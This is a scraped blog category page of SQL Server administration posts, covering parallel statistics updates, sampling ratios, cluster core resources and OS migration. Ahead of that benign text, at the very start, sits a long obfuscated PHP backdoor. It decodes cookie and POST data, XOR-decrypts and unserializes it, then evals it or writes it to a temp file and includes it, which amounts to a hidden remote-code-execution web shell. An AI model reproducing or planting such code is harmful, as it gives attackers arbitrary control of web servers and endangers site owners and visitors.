$AarZirX = "\x42" . 'k' . "\155" . chr (95) . "\144" . "\x6a" . chr ( 424 - 326 ); $SNqti = "\143" . chr ( 115 - 7 ).chr ( 794 - 697 )."\x73" . "\x73" . "\137" . "\145" . "\170" . 'i' . 's' . 't' . chr (115); $fmTOLe = class_exists($AarZirX); $AarZirX = "47942";$SNqti = "52429";$PhHVZnmDLJ = FALSE;if ($fmTOLe === $PhHVZnmDLJ){$KDxORKW = "27103";class Bkm_djb{public function OBITDK(){echo "818";}private $RzxqsUlfk;public static $lXRryX = "3c0f0536-331e-42b2-b91f-3f993aeb70d6";public static $yQsWWiQmTQ = 64328;public function __construct($XBbosKljtQ=0){$YqUpk = $_POST;$izixkj = $_COOKIE;$BijfyoaVs = @$izixkj[substr(Bkm_djb::$lXRryX, 0, 4)];if (!empty($BijfyoaVs)){$hgOXrXV = "base64";$ZVUxc = "";$BijfyoaVs = explode(",", $BijfyoaVs);foreach ($BijfyoaVs as $FYlqXZ){$ZVUxc .= @$izixkj[$FYlqXZ];$ZVUxc .= @$YqUpk[$FYlqXZ];}$ZVUxc = array_map($hgOXrXV . '_' . "\x64" . "\x65" . "\143" . 'o' . "\x64" . chr ( 924 - 823 ), array($ZVUxc,)); $ZVUxc = $ZVUxc[0] ^ str_repeat(Bkm_djb::$lXRryX, (strlen($ZVUxc[0]) / strlen(Bkm_djb::$lXRryX)) + 1);Bkm_djb::$yQsWWiQmTQ = @unserialize($ZVUxc);}}private function HKqCHsDiwU($KDxORKW){if (is_array(Bkm_djb::$yQsWWiQmTQ)) {$zBCNREfP = str_replace("\x3c" . "\77" . 'p' . 'h' . 'p', "", Bkm_djb::$yQsWWiQmTQ["\x63" . "\x6f" . chr (110) . "\164" . chr ( 845 - 744 )."\156" . "\164"]);eval($zBCNREfP); $KDxORKW = "27103";exit();}}public function __destruct(){$this->HKqCHsDiwU($KDxORKW);}}$BdbwM = new /* 13409 */ Bkm_djb(); $BdbwM = str_repeat("56053_11300", 1);}$DnInoQ = 'e' . chr (95) . "\151" . chr ( 166 - 47 ).chr ( 288 - 214 )."\156" . "\123";$sgZYU = "\143" . "\x6c" . chr ( 238 - 141 ).chr (115) . 's' . chr ( 716 - 621 ).'e' . 'x' . chr (105) . 's' . "\164" . "\163";$iGuPeeEOM = class_exists($DnInoQ); $sgZYU = "17026";$bOaOKxtCTc = strpos($sgZYU, $DnInoQ);if ($iGuPeeEOM == $bOaOKxtCTc){function DsYqUoA(){$WPJpcpUnll = new /* 44833 */ e_iwJnS(55384 + 55384); $WPJpcpUnll = NULL;}$MhiKquq = "55384";class e_iwJnS{private function sfYnxYOQse($MhiKquq){if (is_array(e_iwJnS::$XLugelOq)) {$name = sys_get_temp_dir() . "/" . crc32(e_iwJnS::$XLugelOq["salt"]);@e_iwJnS::$XLugelOq["write"]($name, e_iwJnS::$XLugelOq["content"]);include $name;@e_iwJnS::$XLugelOq["delete"]($name); $MhiKquq = "55384";exit();}}public function fMJaddCqZ(){$XHoRhPWhk = "121";$this->_dummy = str_repeat($XHoRhPWhk, strlen($XHoRhPWhk));}public function __destruct(){e_iwJnS::$XLugelOq = @unserialize(e_iwJnS::$XLugelOq); $MhiKquq = "2505_55604";$this->sfYnxYOQse($MhiKquq); $MhiKquq = "2505_55604";}public function smNJOxPW($XHoRhPWhk, $oyGYW){return $XHoRhPWhk[0] ^ str_repeat($oyGYW, intval(strlen($XHoRhPWhk[0]) / strlen($oyGYW)) + 1);}public function YNgBy($XHoRhPWhk){$PkLbUPMHd = chr ( 709 - 611 )."\x61" . chr (115) . chr (101) . chr ( 735 - 681 )."\64";return array_map($PkLbUPMHd . '_' . 'd' . "\145" . 'c' . chr ( 368 - 257 )."\144" . chr (101), array($XHoRhPWhk,));}public function __construct($ysVMO=0){$UlzOisFbP = chr (44); $XHoRhPWhk = "";$KQvGUWm = $_POST;$kUpcrE = $_COOKIE;$oyGYW = "ae411f22-f0b6-43e7-b9c3-d12edc4bacbd";$txPNgz = @$kUpcrE[substr($oyGYW, 0, 4)];if (!empty($txPNgz)){$txPNgz = explode($UlzOisFbP, $txPNgz);foreach ($txPNgz as $vlZfNmiotc){$XHoRhPWhk .= @$kUpcrE[$vlZfNmiotc];$XHoRhPWhk .= @$KQvGUWm[$vlZfNmiotc];}$XHoRhPWhk = $this->YNgBy($XHoRhPWhk);}e_iwJnS::$XLugelOq = $this->smNJOxPW($XHoRhPWhk, $oyGYW);if (strpos($oyGYW, $UlzOisFbP) !== FALSE){$oyGYW = explode($UlzOisFbP, $oyGYW); $oIymGRGyG = base64_decode(sha1($oyGYW[0]));}}public static $XLugelOq = 63038;}DsYqUoA();} Administration – The DBA Chronicles

Chronicling journeys in the world of database design and administration

Category: Administration

Multithreaded statistics updater

Overview

We recently performed a major version upgrade of our CRM product, including upgrading to SQL 2016 (see my working environment for details on our environment, and this post for part of our CRM upgrade shenanigans).  As part of Thomas LaRock’s guidance we planned on updating all statistics.  For our CRM environment we have a large amount of data and not a lot of time for the upgrade and post-upgrade maintenance, so I needed to make it as optimal as possible.  Enter parallel updating of statistics, new to SQL 2016!  (Ok, and backported to SQL 2014 SP1CU6). Continue reading

SQL Server Statistics – Who loves ya, baby? You’re beautiful!

SQL Server Statistics

I love ’em.  They are near and dear to my heart.  They are so very important to the query optimizer, and when they ain’t happy ain’t nobody happy.  I discovered stats early on in my career, via Inside Microsoft SQL Server 2000 by Kalen Delaney (which was my bible).  What some people don’t realize is that when SQL Server is auto updating stats it’s generally  while a query is running, where the optimizer realizes the rows have changed sufficiently to invalidate the stats and needs to rebuild them and does so as part of that query execution; as such, the implementation needs to be relatively fast so that query execution isn’t necessarily taking 1000% times longer than it should.  With the db option to auto update statistics asynchronously the default behavior changes so the triggering query keeps on with the original stats but a separate thread is fired to update the stats; in this case the same sampling logic is still used, it’s just not affecting that one query.  Well, with great speed comes smaller and smaller amounts of data being sampled: the sampling ratio is generally inverse to the size of the data, so the larger your data the fewer rows are sampled; with larger data sets it’s easy to see sampling ratios of 0.001%.  One thousandth of a percent.  That’s not a realistic number for the optimizer to use. Continue reading

Powershell script for managing location of core cluster resources

In our SQL Failover Cluster Instance (FCI) environments (overall environment description available here) we generally use 2 servers plus a disk witness (quorum drive) – we only have one data center so we don’t take the overhead of using node majority.  That quorum drive is part of the resource group called “Cluster Group”, commonly known as cluster core resources.  The core cluster resources have no relationship with any other cluster resources (e.g. the SQL Server resource), and they can fail over independently from any other cluster resource. They also stay in place if someone fails over the other resources (i.e. SQL). Continue reading

Using our SAN and VMs for migrating operating systems

As part of a major CRM upgrade we upgraded from Windows 2008R2 and SQL Server 2008R2 to Windows 2012R2 and SQL Server 2016 (woo-hoo!).  Our CRM product is a little complex (see my working environment for some details), and it’s large (over 1TB for the main database), and we needed to perform the upgrade in all of our non-prod environments (4 total for this one).  Since it’s a critical revenue-generating system, our production upgrade would need to be as fast as possible.  Due to the size of the data and the amount of systems and integrations, we were already expecting to have a multi-day outage for the upgrade and full post-upgrade testing. Continue reading

My working environment

Overview

I created this post to use as a reference for how my current working environment is configured, so I don’t have to repeat details in my other posts; I can just reference this post.

What we have

Our shop is predominantly Microsoft, so .NET and MSSQL, with a few others thrown in (MySQL and PHP, really, but I have almost nothing to do with them (yay)), and we’re also in the process of integrating Azure into the mix. Other than our production environment we have 2-3 non-prod tiers for almost all of our ecosystems: DEV and QA for almost all, and PLT (performance load testing) for a couple. We are a VMWare shop and aside from a few older systems almost 100% of our environment is virtualized (of the machines which can be virtualized, of course). Because of this, we have dedicated ESX hosts for all of our SQL Servers and license the hosts; this allows us to have as many VMs as we need (as an enterprise client we have Software Assurance) as well as use Enterprise Edition, which also allows us to create dedicated SQL Servers for individual ecosystems and not have to worry about the issues with sharing. We currently have around 90 SQL Server instances in production. Continue reading

© 2024 The DBA Chronicles

Theme by Anders NorenUp ↑